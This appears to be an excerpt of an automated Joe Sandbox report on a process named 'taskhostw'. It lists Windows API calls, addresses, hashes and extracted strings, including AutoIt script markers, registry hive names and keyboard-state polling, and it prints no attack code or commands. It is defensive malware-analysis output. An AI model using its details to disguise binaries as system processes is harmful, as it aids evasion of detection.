                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 2698844021-4113822522
                                                                  • Opcode ID: 26c48de51ab7e6c585676af1494404da4df13413c6252bab18642e50384132dc
                                                                  • Instruction ID: 1ffae143655b0f720da14851165efe857fb008480d6c641b9023bd2d2d41c9e9
                                                                  • Opcode Fuzzy Hash: 26c48de51ab7e6c585676af1494404da4df13413c6252bab18642e50384132dc
                                                                  • Instruction Fuzzy Hash: 5C51A1715183059FC700EF20C8919AAB7F9FFA8718F40496DF896972A1DB31EE46CB52
                                                                  APIs
                                                                    • Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623
                                                                  • PostMessageW.USER32 ref: 0023C266
                                                                  • GetFocus.USER32(?,?,?,?), ref: 0023C276
                                                                  • GetDlgCtrlID.USER32 ref: 0023C281
                                                                  • _memset.LIBCMT ref: 0023C3AC
                                                                  • GetMenuItemInfoW.USER32 ref: 0023C3D7
                                                                  • GetMenuItemCount.USER32(?), ref: 0023C3F7
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0023C40A
                                                                  • GetMenuItemInfoW.USER32 ref: 0023C43E
                                                                  • GetMenuItemInfoW.USER32 ref: 0023C486
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0023C4BE
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0023C4F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: 7b91ba0a1c5b0e78be96d59f71aa3c3bf27152f31523b96888ed1ff317945a34
                                                                  • Instruction ID: 68e3b1aecf2e0fe955bfb4f823a3b2933e6d97fa8f5eff840c5b5d753dca6fe6
                                                                  • Opcode Fuzzy Hash: 7b91ba0a1c5b0e78be96d59f71aa3c3bf27152f31523b96888ed1ff317945a34
                                                                  • Instruction Fuzzy Hash: 72818FB1618312AFD710DF14D994A7BBBE8FF88314F20452EFA95A7291C770D815CBA2
                                                                  APIs
                                                                    • Part of subcall function 001D0AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,001B6C6C,?,00008000), ref: 001D0AF3
                                                                    • Part of subcall function 001B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B48A1,?,?,001B37C0,?), ref: 001B48CE
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001B6D0D
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 001B6E5A
                                                                    • Part of subcall function 001B59CD: _wcscpy.LIBCMT ref: 001B5A05
                                                                    • Part of subcall function 001D37BD: _iswctype.LIBCMT ref: 001D37C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 537147316-1018226102
                                                                  • Opcode ID: fcacfdcb9ee9812928e95829dc21b3edee68969e0652eefddb350382bd434d61
                                                                  • Instruction ID: a3de7b22e01ebb698613e26eadc4af1a3edf9205decb44ce7a34fd5260ca4cb3
                                                                  • Opcode Fuzzy Hash: fcacfdcb9ee9812928e95829dc21b3edee68969e0652eefddb350382bd434d61
                                                                  • Instruction Fuzzy Hash: 55029D711087819FC724EF24C881AAFBBE5BFE9314F14491DF496972A2DB30D949CB52
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001B45F9
                                                                  • GetMenuItemCount.USER32(00275890), ref: 001ED6FD
                                                                  • GetMenuItemCount.USER32(00275890), ref: 001ED7AD
                                                                  • GetCursorPos.USER32(?), ref: 001ED7F1
                                                                  • SetForegroundWindow.USER32(00000000), ref: 001ED7FA
                                                                  • TrackPopupMenuEx.USER32 ref: 001ED80D
                                                                  • PostMessageW.USER32 ref: 001ED819
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 2751501086-0
                                                                  • Opcode ID: d9b57bdd7704bd1f9ef4e2b33b44dfabcdf288f097955724117db2a9f822944c
                                                                  • Instruction ID: 39a506915a6ea03e07d9bf44fbe4608171f28518fa17b29520e743d6e0ce6cc2
                                                                  • Opcode Fuzzy Hash: d9b57bdd7704bd1f9ef4e2b33b44dfabcdf288f097955724117db2a9f822944c
                                                                  • Instruction Fuzzy Hash: 58710370A00645BFEB249F55EC89FAABF65FF09368F204216F519A61E1C7B16C60CB50
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002289EC
                                                                  • CoInitialize.OLE32(00000000), ref: 00228A19
                                                                  • CoUninitialize.OLE32 ref: 00228A23
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00228B23
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00228C50
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00242C0C), ref: 00228C84
                                                                  • CoGetObject.OLE32(?,00000000,00242C0C,?), ref: 00228CA7
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00228CBA
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00228D3A
                                                                  • VariantClear.OLEAUT32(?), ref: 00228D4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID: ,,$
                                                                  • API String ID: 2395222682-3408194025
                                                                  • Opcode ID: 4fc3913d2ddb058bd7836da949dd411258f8cd8db51e54cf0612e1634688013c
                                                                  • Instruction ID: 5e805cfb99279db8fed6548ea4a31481f1de470fb1316ec7b2f2b453cff81798
                                                                  • Opcode Fuzzy Hash: 4fc3913d2ddb058bd7836da949dd411258f8cd8db51e54cf0612e1634688013c
                                                                  • Instruction Fuzzy Hash: BEC155B0618315AFD704DFA4D88492AB7E9FF88348F00492DF58ADB261DB71ED06CB52
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00230EBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-909552448
                                                                  • Opcode ID: 8e4d49f89e6333d468da79918a14f497631c021f03502f71f9c29ab8ccb5a30b
                                                                  • Instruction ID: 2be7e506fbf0cf6e313ae12990096166e25c44a23bba3365d79902b47f090d22
                                                                  • Opcode Fuzzy Hash: 8e4d49f89e6333d468da79918a14f497631c021f03502f71f9c29ab8ccb5a30b
                                                                  • Instruction Fuzzy Hash: 85413B7013024A8BCF25EF10DCE1AEE3728AF65344F544465FC515B692DF35A9BACBA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 208665112-3771769585
                                                                  • Opcode ID: 75cc73fb04b5c9eb8545ca74a1e88c02baad8028fc5f9d58b621b953cf29e1a0
                                                                  • Instruction ID: 2ddb613e58c3900d1651b0c57efc4475dec0920f0427cd4cf8976a33ae3f8b59
                                                                  • Opcode Fuzzy Hash: 75cc73fb04b5c9eb8545ca74a1e88c02baad8028fc5f9d58b621b953cf29e1a0
                                                                  • Instruction Fuzzy Hash: 5C11E731914115ABDB25BB20FD4AEEAB7FCDF62711F0401B6F40996191EF709AD286A0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID:
                                                                  • API String ID: 1038674560-0
                                                                  • Opcode ID: 21bf1845f380f627ca9630b9c32677d81d7e08e02c91637065fe8fd2e237a556
                                                                  • Instruction ID: 86a3332449a0f792a9640f5966c2d37ce57b742e1caba5a95a6346afca3a92a4
                                                                  • Opcode Fuzzy Hash: 21bf1845f380f627ca9630b9c32677d81d7e08e02c91637065fe8fd2e237a556
                                                                  • Instruction Fuzzy Hash: 05812370A80725BACB20BB70DD81FAF776AAF15700F540026FD05AA1D1EF74DA45CAA8
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 002103C8
                                                                  • SetKeyboardState.USER32(?), ref: 00210433
                                                                  • GetAsyncKeyState.USER32 ref: 00210453
                                                                  • GetKeyState.USER32(000000A0), ref: 0021046A
                                                                  • GetAsyncKeyState.USER32 ref: 00210499
                                                                  • GetKeyState.USER32(000000A1), ref: 002104AA
                                                                  • GetAsyncKeyState.USER32 ref: 002104D6
                                                                  • GetKeyState.USER32(00000011), ref: 002104E4
                                                                  • GetAsyncKeyState.USER32 ref: 0021050D
                                                                  • GetKeyState.USER32(00000012), ref: 0021051B
                                                                  • GetAsyncKeyState.USER32 ref: 00210544
                                                                  • GetKeyState.USER32(0000005B), ref: 00210552
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 72c97785b875165eaa79ddfa14bf096d988372b7c8e1af653c75f25661e5d652
                                                                  • Instruction ID: 282f6890eb14af49094ead7a04013a9c422e0303b4eeb28aaff3058b4980b813
                                                                  • Opcode Fuzzy Hash: 72c97785b875165eaa79ddfa14bf096d988372b7c8e1af653c75f25661e5d652
                                                                  • Instruction Fuzzy Hash: 8051E92092838969FB34DFA084957EEBFF49F21380F4885D995C2561C3DAE49BDCCB61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3576275495-0
                                                                  • Opcode ID: 73d7e2a36a51b615f4a70796a82e372b4e834be5de16a361a1760331fe4b1594
                                                                  • Instruction ID: df7c22d1932d61f20309943f2247b4efd5155658a44468c5c33f62e6058e3f07
                                                                  • Opcode Fuzzy Hash: 73d7e2a36a51b615f4a70796a82e372b4e834be5de16a361a1760331fe4b1594
                                                                  • Instruction Fuzzy Hash: 0D410472A402047AEB11BB608D86FFF77ADDF45310F1444AAF805E6182EF35A901CBAD
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 0020C545
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0020C557
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0020C5B5
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0020C5C0
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0020C5D2
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0020C626
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0020C634
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0020C645
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0020C688
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0020C696
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0020C6B3
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0020C6C0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 0c1e7d01557a90b4641f5612abf7df30433561305c516cd18e7546b0f5e23d41
                                                                  • Instruction ID: ccaf9beb44ed4c6a5feda18ad3b17589cb29dc7786b938428b6cecb9772467da
                                                                  • Opcode Fuzzy Hash: 0c1e7d01557a90b4641f5612abf7df30433561305c516cd18e7546b0f5e23d41
                                                                  • Instruction Fuzzy Hash: 825143B1F10205AFDB18CF69ED89A6EBBB9EB88310F14822DF515D72E1D7709D008B50
                                                                  APIs
                                                                    • Part of subcall function 001B1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 001B1B9A
                                                                  • DestroyWindow.USER32 ref: 001B20D3
                                                                  • KillTimer.USER32 ref: 001B216E
                                                                  • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE26
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE57
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE6E
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE8A
                                                                  • DeleteObject.GDI32(00000000), ref: 001EBE9C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: 511077f5179232e71f5158ef922897a2db752e44368fe010bc55f294329e7b13
                                                                  • Instruction ID: 26d3c7d23a817f8f76edd27b56d40d3511aaea5ee9efd94f9cfcfae3856400b2
                                                                  • Opcode Fuzzy Hash: 511077f5179232e71f5158ef922897a2db752e44368fe010bc55f294329e7b13
                                                                  • Instruction Fuzzy Hash: E3618D31504A50DFCB39AF19E98CBAAB7F1FF40312F50852DE5469A970C3B0A894DF91
                                                                  APIs
                                                                    • Part of subcall function 001B25DB: GetWindowLongW.USER32(?,000000EB), ref: 001B25EC
                                                                  • GetSysColor.USER32(0000000F,?,?,?,?), ref: 001B21D3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 4e63306681bd6fc82118f6dd4dfe7cfe50605279002b17eb7980854db85a1961
                                                                  • Instruction ID: f2955c0887695755a49fc2bec80d468c82a3273705c12969ea82789948ffacee
                                                                  • Opcode Fuzzy Hash: 4e63306681bd6fc82118f6dd4dfe7cfe50605279002b17eb7980854db85a1961
                                                                  • Instruction Fuzzy Hash: 47419D31400544EBDB255F28FC88BF93B66EB06731F2842A5FDA5CA1E5C7318C86DB61
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0021A995
                                                                  • GetDriveTypeW.KERNEL32(00000061,002689A0,00000061), ref: 0021AA5F
                                                                  • _wcscpy.LIBCMT ref: 0021AA89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: 305872ffb10ffbf9098a5acd945f5d5631eed1e3468e86d4db8fed509a8f7e4f
                                                                  • Instruction ID: 8942a7f81655aa1d2a8cbd4457bdd8d1359d45fa078cf5b498cbd617d401c1f4
                                                                  • Opcode Fuzzy Hash: 305872ffb10ffbf9098a5acd945f5d5631eed1e3468e86d4db8fed509a8f7e4f
                                                                  • Instruction Fuzzy Hash: 6E51CE301293019BC310EF14C9D2AEEB7E9EFA4304F50492DF596972A2DB31DD99CA93
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 02A763BB
                                                                    • Part of subcall function 02A780A8: __getptd_noexit.LIBCMT ref: 02A780A8
                                                                  • __gmtime64_s.LIBCMT ref: 02A76454
                                                                  • __gmtime64_s.LIBCMT ref: 02A7648A
                                                                  • __gmtime64_s.LIBCMT ref: 02A764A7
                                                                  • __allrem.LIBCMT ref: 02A764FD
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A76519
                                                                  • __allrem.LIBCMT ref: 02A76530
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A7654E
                                                                  • __allrem.LIBCMT ref: 02A76565
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A76583
                                                                  • __invoke_watson.LIBCMT ref: 02A765F4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: 1c4455a8cabbafb8053031da4900f27aa4d22a0464a805da282a5d848683b4d7
                                                                  • Instruction ID: 34452ce2f71c85a2a3053dea700aac207927513e582d5c8be32ad0529751c78a
                                                                  • Opcode Fuzzy Hash: 1c4455a8cabbafb8053031da4900f27aa4d22a0464a805da282a5d848683b4d7
                                                                  • Instruction Fuzzy Hash: EA712971A40B16ABEB14AF78CD81B6AB7BDAF04B24F14427AE514D7280EF70D940CBD4
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001D6FBB
                                                                    • Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8
                                                                  • __gmtime64_s.LIBCMT ref: 001D7054
                                                                  • __gmtime64_s.LIBCMT ref: 001D708A
                                                                  • __gmtime64_s.LIBCMT ref: 001D70A7
                                                                  • __allrem.LIBCMT ref: 001D70FD
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D7119
                                                                  • __allrem.LIBCMT ref: 001D7130
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D714E
                                                                  • __allrem.LIBCMT ref: 001D7165
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D7183
                                                                  • __invoke_watson.LIBCMT ref: 001D71F4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
